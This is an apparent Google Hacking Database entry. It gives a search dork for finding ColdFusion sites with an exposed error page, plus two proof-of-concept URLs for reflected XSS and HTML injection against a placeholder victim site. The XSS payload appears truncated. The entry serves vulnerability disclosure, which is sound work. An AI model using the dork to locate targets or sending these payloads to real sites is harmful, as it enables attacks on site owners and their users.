inurl:"index.cfm?action=" intext:"Exception in onError"

GHDB-ID:

5618

Author:

Marcos Almeida

Google Dork Description:

inurl:"index.cfm?action=" intext:"Exception in onError"

I have found a vulnerability in error page of coldfusion,

Name of author: Marcos Almeida

PoC

XSS
https://victimwebsite.com/?action=./ERROR?">&fw1pk=3

HTMLI
https://victimwebsite.com/?action=./ERROR?">ERROR&fw1pk=3